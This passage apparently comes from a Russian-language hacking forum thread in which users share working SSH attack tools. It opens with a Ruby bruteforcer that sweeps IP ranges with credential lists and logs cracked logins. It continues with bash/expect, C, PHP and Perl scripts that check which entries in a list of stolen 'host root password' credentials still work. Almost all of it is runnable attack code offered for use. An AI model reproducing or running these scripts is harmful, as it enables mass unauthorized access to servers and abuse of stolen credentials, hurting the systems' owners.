есть брут) PHP: #!/usr/bin/ruby require 'rubygems' require 'net/ssh' require 'logger' require 'timeout' def usage() puts "Rubby SSH Bruteforcer Coded by nrktx (backdoored.net)\n" puts "Usage:./narko_ssh startip endip user_pass.txt iplist.txt\n" end if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil usage() exit end vicstart = ARGV[0].to_s vicend = ARGV[1].to_s vicfile = ARGV[2].to_s hostfile = ARGV[3].to_s def ipholocast(startip,endip,vicfile) # 31.31.31.31 index1 = startip.index(".") #3 index2 = startip[index1+1..startip.length].index(".") + index1 + 1 #7 index3 = startip[index2+1..startip.length].index(".") + index2 +1 #10 ip1 = startip[0...index1].to_i ip2 = startip[index1+1...index2].to_i ip3 = startip[index2+1...index3].to_i ip4 = startip[index3+1...startip.length].to_i index1 = endip.index(".") #3 index2 = endip[index1+1..endip.length].index(".") + index1 + 1 #7 index3 = endip[index2+1..endip.length].index(".") + index2 +1 #10 ipe1 = endip[0...index1].to_i ipe2 = endip[index1+1...index2].to_i ipe3 = endip[index2+1...index3].to_i ipe4 = endip[index3+1...endip.length].to_i for m in 0...255 next if ip1 > 254 if ip1 == 254 ip1 = 0 end for l in 0...255 next if ip2 > 254 if ip2 == 254 ip2 = 0 end for k in 0...255 next if ip3 > 254 if ip3 == 254 ip3 = 0 end ###################### for i in 0...255 next if ip4 > 254 if ip4 == 254 ip4 = 0 end victim = ip1.to_s + "." + ip2.to_s + "." + ip3.to_s + "." + ip4.to_s failed = 1 open(vicfile.to_s,"r") do |hoho| hoho.readlines.each do |lines| owned = open("lamer.txt","a+") z = lines.index(":") username = lines[0...z] password = lines[z+1..lines.length].to_s.chop puts "Now trying Host = " + victim + " Username = " + username + " Password = " + password timeout(5) do begin session = Net::SSH.start(victim,22,username,password, :host_key => "ssh-rsa", :encryption => "blowfish-cbc" # :compression => "zlib" ) rescue Errno::ECONNREFUSED => h failed = 1 rescue Timeout::Error => f failed = 1 rescue Net::SSH::AuthenticationFailed => e failed = 1 rescue Errno::EHOSTUNREACH => x failed = 1 end end if failed != 1 owned.write victim + ":" + username + ":" + password + "\n" owned.close() end failed = 0 end end if ip1 == ipe1 && ip2 == ipe2 && ip3 == ipe3 && ip4 == ipe4 puts "SCAN DONE\n" exit end ip4 = ip4 + 1 end ####################### ip3 = ip3 +1 end ip2 = ip2 +1 end ip1 = ip1 +1 end end ######################################################### def ipholocast2(vicfile,hostfile) open(hostfile.to_s,"r") do |deads| deads.readlines.each do |zombie| zombie.chop failed = 0 open(vicfile.to_s,"r") do |hoho| hoho.readlines.each do |lines| owned = open("lamer.txt","a+") z = lines.index(":") username = lines[0...z] password = lines[z+1..lines.length].chop #puts "Now trying Host = " + zombie + " Username = " + username + " Password = " + password timeout(5) do begin session = Net::SSH.start(zombie,22,username,password, :host_key => "ssh-rsa", :encryption => "blowfish-cbc" # :compression => "zlib" ) rescue Errno::ECONNREFUSED => haha failed = 1 rescue Timeout::Error => f failed = 1 rescue Net::SSH::AuthenticationFailed => e failed = 1 rescue Errno::EHOSTUNREACH => x failed = 1 end end if failed != 1 owned.write zombie.chop + ":" + username + ":" + password + "\n" owned.close() end failed = 0 end end end end end ################################################# if hostfile.to_i == 1 ipholocast(vicstart,vicend,vicfile) end ipholocast2(vicfile,hostfile)
Благодарю за брут, хотя можно было переписать данный брут под чекер, но ми не сечь в Ruby (... Просто имеет база виде 194.334.5.7 root &k234m^ и т.д ... Нужен софт или скрипт чекер на валидность....
Вот, держи: expect + bash ssh.sh - сам чекер. В качаестве параметра даётся файл с содержанием localhost root pass ... Валидные акки идут в файл good-ssh Code: #!/bin/bash if [ $# > 0 ]; then file=`cat $1` t=0 for i in ${file[@]/\r\n//} do case $t in 0) host=$i ;; 1) user=$i ;; *) pass=$i t=0 expect ./ssh.exp $host $user $pass > /dev/null if [ $? = 1 ]; then echo "$host $user $pass" >> good-ssh fi esac let "t+=1" done else echo "Use: $0 file" fi ssh.exp - работа с ssh на expect . Положить рядом с ssh.sh Code: #!/usr/bin/expect proc auth {1 2 3} { global result spawn ssh "$2@$1" expect { "Password:" { send "$3\r" } timeout { set result 0 return 0 } "known" { set result 0 return 0 } "yes" { send "yes\r" } } expect { "Password:" { set result 0 return 0 } "denied" { set result 0 return 0 } -ex "$" { send "quit\r" set result 1 return 1 } -ex "#" { send "quit\r" set result 1 return 1 } timeout { set result 0 return 0 } } } set i 1 foreach arg $argv { if { $i == 1 } { set host $arg } if { $i == 2 } { set login $arg } if { $i == 3 } { set pass $arg } incr i } auth $host $login $pass exit $result
На сях. Код не оптимизированный да и сильно не тестировал. Просьба сильно за код не пинать)) Юзает http://kent.dl.sourceforge.net/sourceforge/libssh2/libssh2-0.18.tar.gz Code: #include <stdio.h> #include <string.h> #include <errno.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <stdlib.h> #include <netinet/in.h> #include <sys/socket.h> #include <libssh2.h> #define MAX_SIZE 0xff FILE *f; char *hostloginpass [3]; int sock; //LIBSSH2_SESSION *session; void usage (char *name) { printf ("Usage: %s [input_file]\n", name); } void clear_file () { fclose (f); } void clear_file_and_array () { int i; fclose (f); for (i = 0; i < 3; i++) { //printf ("LOL: %s\n", hostloginpass [i]); free (hostloginpass [i]); } //clear_file (); } void clear_file_and_array_and_socket () { int i; //printf ("HOST: %s\n", hostloginpass [0]); close (sock); fclose (f); for (i = 0; i < 3; i++) { //printf ("LOL: %s\n", hostloginpass [i]); free (hostloginpass [i]); } //clear_file_and_array (); } int create_socket (char *host, int port) { int s; struct sockaddr_in sin; int i = 1, failed = 1; if ((s = socket (AF_INET, SOCK_STREAM, 0)) < 0) return -1; memset (&sin, '\0', sizeof (struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_port = htons (port); sin.sin_addr.s_addr = inet_addr (host); /*if (bind (s, (struct sockaddr *) &sin, sizeof (struct sockaddr_in)) < 0) return -2;*/ while ((i < 10) && (failed == 1)) { if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr_in)) < 0) { //printf ("I: %d\nFAILED: %d\n", i, failed); i++; } else failed = 0; //return -2; } //printf ("I: %d\nFAILED: %d\n", i, failed); if (i == 10) return -2; return s; } int testlogin (int s, char *login, char *pass) { LIBSSH2_SESSION *session; int res; char *fp; session = libssh2_session_init (); if (libssh2_session_startup (session, s)) { return -1; } /*fp = libssh2_userauth_list (session, login, strlen (login)); printf ("FP: %s\n", fp);*/ if (libssh2_userauth_password (session, login, pass)) res = 0; else res = 1; libssh2_session_free (session); return res; } int main (int argc, char **argv) { char fname [MAX_SIZE]; static char line [MAX_SIZE]; int line_count/*, is_first_line = 1*/; unsigned char i; char *pline, *find_char; struct stat st; FILE *f; struct sockaddr_in sin; if (argc != 2) { usage (argv [0]); return 0; } bzero (fname, MAX_SIZE); bzero (&st, sizeof (struct stat)); strncpy (fname, argv [1], strlen (argv [1])); if ((stat (fname, (struct stat *) &st)) < 0) { printf ("%s: stat() error: %s\n", fname, strerror (errno)); return -1; } //printf ("STAT: %lo\n", st.st_mode & S_IFREG); if ((st.st_mode & S_IFREG) != S_IFREG) { printf ("%s: not regular file or symlink.\n", fname); return -1; } if ((f = fopen (fname, "r")) == NULL) { printf ("%s: open failure. Error: %s\n", fname, strerror (errno)); return -1; } while (!feof (f)) { bzero (line, MAX_SIZE); if (fgets (line, MAX_SIZE, f) != NULL) { if (sizeof (line) > MAX_SIZE) { printf ("Segmentation fault :)\n"); fclose (f); return -1; } *(unsigned char *) (line + strlen (line) - 1) = '\0'; /*if (is_first_line) { line_count = atoi (line); is_first_line = 0; continue; }*/ pline = find_char = line; while ((find_char = strchr (find_char, 0x20)) != NULL) { (*(unsigned char *) find_char) = '\0'; find_char++; //printf ("FIND_CHAR: %s\nLINE: %s\n", find_char, pline); } //printf ("HOST: %s\n", pline); //pline += (strlen (pline) + 1); for (i = 0; i < 3; i++) { if ((hostloginpass[i] = calloc (strlen (pline), 1)) == NULL) { printf ("calloc() error: %s\n", strerror (errno)); fclose (f); return -1; } strncpy (hostloginpass [i], pline, strlen (pline)); pline += (strlen (pline) + 1); } //printf ("USER: %s\n", hostloginpass [2]); sock = create_socket (hostloginpass [0], 22); //printf ("USER: %s\n", hostloginpass [0]); switch (sock) { case -1: printf ("socket1() error: %s\n", strerror (errno)); clear_file_and_array (); return -1; break; case -2: printf ("socket2() error: %s\n", strerror (errno)); //printf ("USER: %s\n", hostloginpass [0]); clear_file_and_array_and_socket (); return -1; break; default: break; } //printf ("Socket Created\n"); printf ("Trying %s:%s on host %s... ", hostloginpass [1], hostloginpass [2], hostloginpass [0]); switch (testlogin (sock, hostloginpass [1], hostloginpass [2])) { case -1: printf ("ssh_connect() error: %s\n", strerror (errno)); clear_file_and_array_and_socket (); return -1; break; case 0: printf ("- fail\n"); break; case 1: printf ("- ok\n"); break; default: break; } close (sock); for (i = 0; i < 3; i++) free (hostloginpass [i]); //printf ("%s", line); } } fclose (f); return 0; }
Еще одна чекалка, теперь и на php. Необходимо расширение ssh2.so PHP: #!/usr/bin/php <?php function testlogin ($host, $user, $pass) { $connect = ssh2_connect ($host, 22); if (!$connect) return -1; if (ssh2_auth_password ($connect, $user, $pass)) return 1; else return 0; } error_reporting (0); if ($argc == 1) die ("usage: " . $_SERVER['PHP_SELF'] . "[input_file]\n"); $fname = $argv[1]; if (!is_file ($fname) && !is_link ($fname)) die ($fname . ": not regular file or symlink\n"); if (!is_readable ($fname)) die ($fname . ": reading error\n"); $content = file ($fname); foreach ($content as $line) { $line = preg_replace ("/\n/", "", $line); list ($host, $user, $pass) = explode (" ", $line); //echo $host . ":" . $user . ":" . $pass . "\n"; echo "Trying $user:$pass on host $host - "; switch (testlogin ($host, $user, $pass)) { case 1: echo "ok\n"; break; case 0: echo "fail\n"; break; default: echo "connection refused\n"; break; } } ?>
Ну и по просьбе трудящихся на перле. Необходим модуль Net::SSH2 Code: #!/usr/bin/perl use Fcntl ':mode'; use Net::SSH2; ###### Config options ###### $input_file = 'ssh.txt'; $bad_file = 'bad.txt'; $good_file = 'good.txt'; ############################ $res = getfilestat ($input_file); die $input_file . ": error: " . $! . "\n" if ($res < 0); open (INPUT, "<$input_file") || die "$input_file: error: " . $! . "\n"; open (BAD, ">$bad_file") || die "$bad_file: error: " . $! . "\n"; open (GOOD, ">$good_file") || die "$good_file: error: " . $! . "\n"; while (<INPUT>) { $_ =~ s/\n$//; $_ =~ s/\s*$//; $_ =~ s/^\s*//; $_ =~ s/\s+/ /g; ($host, $user, $pass) = (split (/ /, $_))[0,1,2]; $ssh = Net::SSH2->new (); $ssh->connect ($host, 22) || die "$host: connection refused: " . $! . "\n"; print "Trying $host\@$user:$pass...\n"; $islogin = $ssh->auth_password ($user, $pass); if (!$islogin) { print BAD "$host\@$user:$pass\n"; } else { print GOOD "$host\@$user:$pass\n"; } } close GOOD; close BAD; close INPUT; print "Checking complete\n"; exit 0; sub getfilestat ($) { my ($fname) = @_; my ($mode); $mode = (stat ($fname))[2]; (($mode & S_IFREG) == S_IFREG) ? return 0 : return -1; }
